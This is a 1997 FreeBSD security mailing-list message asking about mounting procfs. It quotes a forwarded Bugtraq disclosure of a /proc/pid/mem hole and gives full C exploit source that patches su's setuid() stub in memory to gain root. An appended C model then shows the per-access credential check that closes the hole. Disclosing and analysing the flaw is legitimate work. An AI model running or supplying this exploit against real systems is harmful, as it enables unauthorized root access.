From owner-freebsd-security  Wed Aug 13 14:10:44 1997
Return-Path: 
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA27825 for security-outgoing; Wed, 13 Aug 1997 14:10:44 -0700 (PDT)
Received: from kaori.communique.net (kaori.communique.net [204.27.67.55]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA27820 for ; Wed, 13 Aug 1997 14:10:38 -0700 (PDT)
Received: by kaori.communique.net with Internet Mail Service (5.0.1457.3) id ; Wed, 13 Aug 1997 16:10:37 -0500
Message-ID: 
From: Raul Zighelboim 
To: freebsd-security@FreeBSD.ORG
Subject: RE: procfs hole (fwd)
Date: Wed, 13 Aug 1997 16:10:34 -0500
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1457.3)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

What are the pros/cons of having /procfs mounted?

Thanks.

> -----Original Message-----
> From: Ted Wisniewski [SMTP:ted@wiz.plymouth.edu]
> Sent: Monday, August 11, 1997 10:05 PM
> To: freebsd-security@FreeBSD.ORG
> Subject: FW: procfs hole (fwd)
>
> I do not read this list... I want to be sure that someone was aware
> of this. I have tested it myself and the only immediate cure is to not
> mount the /proc filesystem. I would encourage anyone with it mounted
> to unmount it (unless a patch is available to fix the problem). Below
> is the original message and exploit.
>
> -----Original Message-----
> From: Brian Mitchell [SMTP:brian@FIREHOUSE.NET]
> Sent: Sunday, August 10, 1997 5:38 AM
> To: BUGTRAQ@NETSPACE.ORG
> Subject: procfs hole
>
> There is a major hole in procfs under FreeBSD 2.2.1 (2.1 is not affected;
> I have not tested 3.x but I believe it to be vulnerable as well), along
> with OpenBSD (not tested by me, but by someone else -- I believe it was
> 2.1-RELEASE, although obsd doesn't mount procfs by default like FreeBSD
> does).
>
> The problem is that all /proc/#/mem access is controlled by the permissions
> on the file. This means you can fork(), open the child's mem device and
> then have the child execute a setuid executable. Once this is done, you can
> modify the setuid executable's memory -- even segments that are supposed to
> be non-writable can be modified. Enclosed is a simple exploit tested under
> FreeBSD 2.2.1 -- beware, this exploit is slow because it searches memory
> for a specific signature. Oh, you need to change your shell to a Bourne-ish
> shell too, since csh/tcsh will not work when euid != ruid (unless passed
> a -b script argument).
>
> BSDI is also believed to be vulnerable. Unfortunately, not only is procfs
> not mounted, it is not even in the GENERIC kernel.
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>      /* bcmp() */
> #include <fcntl.h>
> #include <signal.h>
> #include <unistd.h>
> #include <sys/types.h>
> #include <sys/wait.h>
>
> /* The 4.4BSD libc setuid() stub: load syscall number 0x17 (SYS_setuid)
>  * into %eax, then trap into the kernel through the call gate at 7:0. */
> u_char search_code[13] = {
>     0x8d, 0x05, 0x17, 0x00, 0x00, 0x00,              /* leal 0x17, %eax */
>     0x9a, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00};       /* lcall 7,0 */
>
> /* just do a xor %eax, %eax and then a ret: setuid() now "succeeds"
>  * without ever entering the kernel, so su keeps its root euid */
> u_char new_code[] = {
>     0x31, 0xc0, 0xc3};
>
> int
> main(int argc, char **argv)
> {
>     int pid;
>     int fd;
>     char buff[40];
>     char *user;
>
>     /* might need to tweak these */
>     u_int offset = 0x8003000;
>     u_int offset_end = 0x8099000;
>
>     if (argc < 2) {
>         fprintf(stderr, "%s user\n", argv[0]);
>         exit(1);
>     }
>     printf("Demonstration of 4.4BSD procfs hole\n");
>     printf("Brian Mitchell \n\n");
>     printf("after you see \"setuid changed\", enter the pw for the user\n");
>     printf("\aBe warned, searching for the setuid() function takes a long time!\n");
>     user = argv[1];
>     pid = fork();
>     switch (pid) {
>     case -1:
>         perror("fork");
>         exit(1);
>     case 0:
>         /* give parent time to open /proc/pid/mem */
>         sleep(3);
>         execl("/usr/bin/su", "su", user, NULL);
>         exit(0);
>     default:
>         /* the mem node is ours while the child is still our image;
>          * the descriptor stays open and writable across the exec of su */
>         sprintf(buff, "/proc/%d/mem", pid);
>         fd = open(buff, O_RDWR);
>         if (fd < 0) {
>             perror("open procmem");
>             wait(NULL);
>             exit(1);
>         }
>         /* wait for child to execute suid program */
>         sleep(6);
>         /* stop the child (the original used the BSD signal number 17) */
>         kill(pid, SIGSTOP);
>         printf("searching - please be patient...\n");
>         /* search for the setuid code */
>         while (offset != offset_end) {
>             lseek(fd, offset, SEEK_SET);
>             read(fd, buff, 13);
>             if (!bcmp(buff, search_code, 13)) {
>                 lseek(fd, offset, SEEK_SET);
>                 write(fd, new_code, 3);
>                 printf("setuid changed (0x%x)\n", offset);
>                 /* sigcont child (the original used the BSD signal number 19) */
>                 kill(pid, SIGCONT);
>                 wait(NULL);
>                 exit(0);
>             }
>             offset++;
>         }
>         printf("setuid not found!!\n");
>         kill(pid, SIGKILL);
>         wait(NULL);
>         exit(1);
>     }
>     return 0;
> }
>
>
> Brian Mitchell                                  brian@firehouse.net
> "BSD code sucks. Of course, everything else sucks far more."
>                       - Theo de Raadt (OpenBSD President)
>
>
> --
> | Ted Wisniewski          INET: ted@oz.plymouth.edu             |
> | Computer Services             ted@wiz.plymouth.edu            |
> | Plymouth State College        tedw@psc.plymouth.edu           |
> | Plymouth NH, 03264      HTTP: http://oz.plymouth.edu/~ted/    |
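As an added example (not part of this thread and not FreeBSD's or OpenBSD's own code), the following is a user-space model of the credential check that closes the hole Brian describes. The exploit works because the vulnerable procfs decides access to /proc/pid/mem from the node's file mode at open() time only, so a descriptor a parent opened on its own child stays writable after the child execs set-uid su. The check modelled here is applied on every read and write of the mem node, not just at open, and it grants access only when the caller's real, effective and saved uids all equal the target's real uid and the target has not exec'd a set-user-id or set-group-id image since fork (the BSD kernels track that with a per-process flag named P_SUGID; root is exempt). The struct and function names are assumptions made for this model, and the credential layout is a simplification of the kernel's.

```c
#include <stdbool.h>
#include <stdio.h>
#include <sys/types.h>

/* Hypothetical user-space model of the per-process state that matters here.
 * The real kernel keeps these in struct proc / struct pcred. */
struct model_proc {
    uid_t ruid;      /* real uid */
    uid_t euid;      /* effective uid */
    uid_t svuid;     /* saved uid */
    bool  sugid;     /* set when the process has exec'd a set-id image (P_SUGID) */
};

/* What the vulnerable procfs effectively did: decide from ownership of the
 * mem node, and only at open() time. After that the descriptor is trusted. */
bool mode_only_check(const struct model_proc *curp, const struct model_proc *targp)
{
    return curp->euid == 0 || curp->euid == targp->ruid;
}

/* Hardened check, to be run on every access to /proc/<pid>/mem:
 * root may always; anyone else only if no privilege boundary separates
 * the two processes. */
bool mem_access_ok(const struct model_proc *curp, const struct model_proc *targp)
{
    if (curp->euid == 0)
        return true;
    if (curp->euid != targp->ruid)
        return false;
    if (curp->ruid != targp->ruid)
        return false;
    if (curp->ruid != targp->svuid)
        return false;
    if (targp->sugid)          /* target has exec'd a set-id image: deny */
        return false;
    return true;
}

/* Model of exec(): a set-uid-root image raises euid/svuid and marks the
 * process as having crossed a privilege boundary. */
void model_exec(struct model_proc *p, bool image_is_setuid_root)
{
    if (image_is_setuid_root) {
        p->euid = 0;
        p->svuid = 0;
        p->sugid = true;
    }
}

/* The sequence from the exploit: a parent opens its child's mem node, the
 * child execs su(1), and the parent then tries to write. Returns true when
 * the hardened check allows the open (same user) but denies the write
 * after exec, which is the behaviour that defeats the exploit. */
bool exploit_sequence_blocked(void)
{
    struct model_proc parent = { 1000, 1000, 1000, false };
    struct model_proc child  = parent;              /* fork() copies credentials */
    bool open_ok   = mem_access_ok(&parent, &child); /* true: same user, no set-id */
    model_exec(&child, true);                        /* child runs setuid-root su */
    bool write_ok  = mem_access_ok(&parent, &child); /* false: P_SUGID is set */
    return open_ok && !write_ok;
}

/* Same sequence under the mode-only check: the open succeeds and the
 * descriptor is never re-examined, so the write goes through. Returns true
 * when the write is still allowed, i.e. the hole is present. */
bool exploit_sequence_open_under_mode_check(void)
{
    struct model_proc parent = { 1000, 1000, 1000, false };
    struct model_proc child  = parent;
    bool open_ok = mode_only_check(&parent, &child); /* true at open() */
    model_exec(&child, true);
    return open_ok;                                  /* nothing re-checks the fd */
}

int main(void)
{
    printf("mode-only check leaves the hole open: %s\n",
           exploit_sequence_open_under_mode_check() ? "yes" : "no");
    printf("per-access credential check blocks it: %s\n",
           exploit_sequence_blocked() ? "yes" : "no");
    return 0;
}
```

The design point is the second half of the check: comparing uids alone is not enough, because immediately after fork the child really is the caller's own process; what changes is the exec of a set-id image, so the kernel has to remember that event and re-run the test on every access rather than only when the node is opened.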